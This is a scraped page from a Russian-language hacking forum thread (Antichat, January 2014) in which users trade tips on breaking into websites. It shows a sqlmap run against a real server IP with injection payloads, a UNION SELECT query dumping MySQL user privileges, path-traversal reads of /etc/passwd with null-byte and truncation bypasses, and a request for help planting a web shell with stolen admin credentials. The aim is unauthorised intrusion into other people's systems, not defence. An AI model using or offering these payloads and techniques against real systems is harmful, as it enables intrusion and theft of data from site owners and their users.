HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23151  
Старый 05.01.2014, 18:29
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от kingbeef  
kingbeef said:
Фильтруется table_name . Что сделать можно?
подзапросы используй

chapters,flags,lands,menu,menu_out,roots,screens,s ites,stat,val,words
 
Ответить с цитированием

  #23152  
Старый 06.01.2014, 18:22
verda
Guest
Сообщений: n/a
Провел на форуме:
210

Репутация: 0
По умолчанию

Просканировал с помощью sqlmap один игровой сервер

sqlmap --url="http://95.163.86.72/cgi-bin/webstrk.exe/strike?t=1" --data="position=0&tmpid=01234567890234567890"

в логе написало:

......

[16:45:33] [INFO] POST parameter 'position' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[16:45:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access'

.....

[16:51:10] [WARNING] POST parameter 'position' is not injectable

[16:51:10] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

.....

Тестировал несколько раз.

Просмотрев лог запросов увидел что срабатывало на

position=-6458' OR (3053=8541)

position=0%22%29%20AND%206045%3D4434%20AND%20%28%2 2sLat%22%3D%22sLat

position=0%20AND%205338%3D7364

Вручную перебирал - ничего толкового не выходило (ошибки так таковой нету).

Вопрос - Есть ли вообще инъекция и какая база данных? (Microsoft Access или нет?)
 
Ответить с цитированием

  #23153  
Старый 06.01.2014, 18:55
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию

+UnIon+selECt+group_concat(user,0x3a,file_priv),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+mysql.user

не выводит: Y, N

В чем ошибка? Как узнать права?!
 
Ответить с цитированием

  #23154  
Старый 06.01.2014, 21:54
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Always  
Always said:
+UnIon+selECt+group_concat(user,0x3a,file_priv),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+mysql.user
не выводит: Y, N
В чем ошибка? Как узнать права?!
Если даже нет прав на mysql.user, то и File_priv подавно не будет.
 
Ответить с цитированием

  #23155  
Старый 06.01.2014, 22:04
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
Если даже нет прав на mysql.user, то и File_priv подавно не будет.
есть!
 
Ответить с цитированием

  #23156  
Старый 07.01.2014, 14:32
x.Com
Guest
Сообщений: n/a
Провел на форуме:
388

Репутация: 0
По умолчанию

бандиты подскажите плз

короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (

короче беда, подскажите че придумать можно?
 
Ответить с цитированием

  #23157  
Старый 07.01.2014, 15:31
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от x.Com  
x.Com said:
бандиты подскажите плз
короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
короче беда, подскажите че придумать можно?
ищи админку
 
Ответить с цитированием

  #23158  
Старый 08.01.2014, 04:14
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию

как крутить подобное ?

Код:
Code:
Failed to load: index/page_../../../../../../../../../etc/passwd.txt
 
Ответить с цитированием

  #23159  
Старый 08.01.2014, 13:00
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от psihoz26  
psihoz26 said:
как крутить подобное ?
Код:
Code:
Failed to load: index/page_../../../../../../../../../etc/passwd.txt
/etc/passwd%00 или /etc/passwd[////4096////]
 
Ответить с цитированием

  #23160  
Старый 08.01.2014, 19:14
x.Com
Guest
Сообщений: n/a
Провел на форуме:
388

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
ищи админку
дык найти не могу, второй день сижу уже, все перепробывал
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ